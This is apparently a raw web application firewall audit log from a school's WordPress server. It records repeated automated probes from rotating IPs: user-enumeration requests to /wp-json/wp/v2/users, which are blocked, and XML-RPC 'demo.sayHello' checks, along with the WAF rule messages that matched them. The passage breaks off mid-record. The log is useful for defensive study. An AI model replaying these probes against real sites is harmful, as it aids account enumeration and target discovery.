Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63fda910-Z-- --cad9cf7a-A-- [17/May/2025:22:31:02 +0700] aCirtgTOsBn9MSWb6WLPowAAAIQ 103.236.140.4 56990 103.236.140.4 8181 --cad9cf7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cad9cf7a-C-- demo.sayHello --cad9cf7a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cad9cf7a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495862685916 5916 (- - -) Stopwatch2: 1747495862685916 5916; combined=4345, p1=560, p2=3540, p3=68, p4=38, p5=82, sr=73, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cad9cf7a-Z-- --3c25404c-A-- [17/May/2025:22:31:41 +0700] aCir3RKi5m5upc8uMd4T3AAAAMY 103.236.140.4 57768 103.236.140.4 8181 --3c25404c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.141 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3c25404c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c25404c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495901036572 2743 (- - -) Stopwatch2: 1747495901036572 2743; combined=1258, p1=408, p2=821, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c25404c-Z-- --faf54250-A-- [17/May/2025:22:31:45 +0700] aCir4XyxdQCiyU1ENFedQwAAAAU 103.236.140.4 57884 103.236.140.4 8181 --faf54250-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.141 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --faf54250-C-- demo.sayHello --faf54250-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf54250-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495905880347 4579 (- - -) Stopwatch2: 1747495905880347 4579; combined=3447, p1=438, p2=2825, p3=27, p4=29, p5=76, sr=57, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf54250-Z-- --2032be1b-A-- [17/May/2025:22:32:22 +0700] aCisBum4kjNN-hEbWjKfagAAAE0 103.236.140.4 58628 103.236.140.4 8181 --2032be1b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2032be1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2032be1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495942350573 2465 (- - -) Stopwatch2: 1747495942350573 2465; combined=1422, p1=445, p2=945, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2032be1b-Z-- --7bfe1f7f-A-- [17/May/2025:22:32:32 +0700] aCisEHyxdQCiyU1ENFedaQAAAAU 103.236.140.4 58828 103.236.140.4 8181 --7bfe1f7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7bfe1f7f-C-- demo.sayHello --7bfe1f7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bfe1f7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495952075119 6466 (- - -) Stopwatch2: 1747495952075119 6466; combined=4707, p1=603, p2=3844, p3=39, p4=43, p5=105, sr=74, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bfe1f7f-Z-- --423df23d-A-- [17/May/2025:22:32:41 +0700] aCisGXyxdQCiyU1ENFeddgAAAAU 103.236.140.4 59008 103.236.140.4 8181 --423df23d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --423df23d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --423df23d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747495961067483 2497 (- - -) Stopwatch2: 1747495961067483 2497; combined=1391, p1=451, p2=908, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --423df23d-Z-- --22806815-A-- [17/May/2025:22:32:51 +0700] aCisIwTOsBn9MSWb6WLQAgAAAIE 103.236.140.4 59216 103.236.140.4 8181 --22806815-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --22806815-C-- demo.sayHello --22806815-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --22806815-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747495971527522 5666 (- - -) Stopwatch2: 1747495971527522 5666; combined=4231, p1=546, p2=3456, p3=32, p4=36, p5=95, sr=77, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --22806815-Z-- --19430603-A-- [17/May/2025:22:33:35 +0700] aCisTxKi5m5upc8uMd4U7wAAANY 103.236.140.4 59988 103.236.140.4 8181 --19430603-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --19430603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19430603-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496015616642 2763 (- - -) Stopwatch2: 1747496015616642 2763; combined=1254, p1=409, p2=816, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19430603-Z-- --f9f8ae65-A-- [17/May/2025:22:33:44 +0700] aCisWBKi5m5upc8uMd4VAAAAAMk 103.236.140.4 60164 103.236.140.4 8181 --f9f8ae65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9f8ae65-C-- demo.sayHello --f9f8ae65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9f8ae65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496024852107 5412 (- - -) Stopwatch2: 1747496024852107 5412; combined=4131, p1=521, p2=3372, p3=32, p4=35, p5=100, sr=72, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9f8ae65-Z-- --c48a2366-A-- [17/May/2025:22:34:06 +0700] aCisbnyxdQCiyU1ENFedtwAAAAY 103.236.140.4 60560 103.236.140.4 8181 --c48a2366-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c48a2366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c48a2366-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496046407353 2341 (- - -) Stopwatch2: 1747496046407353 2341; combined=1197, p1=399, p2=770, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c48a2366-Z-- --a236ac65-A-- [17/May/2025:22:34:06 +0700] aCisbnyxdQCiyU1ENFeduAAAAAA 103.236.140.4 60562 103.236.140.4 8181 --a236ac65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a236ac65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a236ac65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496046452947 2531 (- - -) Stopwatch2: 1747496046452947 2531; combined=1129, p1=411, p2=692, p3=0, p4=0, p5=26, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a236ac65-Z-- --073cc169-A-- [17/May/2025:22:34:06 +0700] aCisbnyxdQCiyU1ENFeduQAAAAI 103.236.140.4 60564 103.236.140.4 8181 --073cc169-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --073cc169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --073cc169-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496046455351 1707 (- - -) Stopwatch2: 1747496046455351 1707; combined=868, p1=273, p2=572, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --073cc169-Z-- --a5a51229-A-- [17/May/2025:22:34:11 +0700] aCiscwTOsBn9MSWb6WLQYQAAAJE 103.236.140.4 60664 103.236.140.4 8181 --a5a51229-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a5a51229-C-- demo.sayHello --a5a51229-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a5a51229-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496051418934 5728 (- - -) Stopwatch2: 1747496051418934 5728; combined=4238, p1=574, p2=3434, p3=35, p4=36, p5=94, sr=73, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a5a51229-Z-- --f9b16e1e-A-- [17/May/2025:22:34:11 +0700] aCisc3yxdQCiyU1ENFedwgAAAAk 103.236.140.4 60666 103.236.140.4 8181 --f9b16e1e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.167.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.167.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f9b16e1e-C-- demo.sayHello --f9b16e1e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9b16e1e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496051421357 5853 (- - -) Stopwatch2: 1747496051421357 5853; combined=4392, p1=533, p2=3614, p3=49, p4=32, p5=96, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9b16e1e-Z-- --89fbb637-A-- [17/May/2025:22:34:11 +0700] aCisc3yxdQCiyU1ENFedwwAAABg 103.236.140.4 60668 103.236.140.4 8181 --89fbb637-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.146 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --89fbb637-C-- demo.sayHello --89fbb637-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --89fbb637-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747496051426079 4456 (- - -) Stopwatch2: 1747496051426079 4456; combined=3547, p1=450, p2=2867, p3=32, p4=23, p5=100, sr=75, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89fbb637-Z-- --42f9610b-A-- [17/May/2025:22:34:32 +0700] aCisiHyxdQCiyU1ENFed-AAAABY 103.236.140.4 32876 103.236.140.4 8181 --42f9610b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.166.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.166.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --42f9610b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42f9610b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747496072881328 2795 (- - -) Stopwatch2: 1747496072881328 2795; combined=1246, p1=440, p2=778, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42f9610b-Z-- --5d9ff35c-A-- [17/May/2025:22:34:36 +0700] aCisjHyxdQCiyU1ENFeeAwAAABg 103.236.140.4 32928 103.236.140.4 8181 --5d9ff35c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5d9ff35c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d9ff35c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 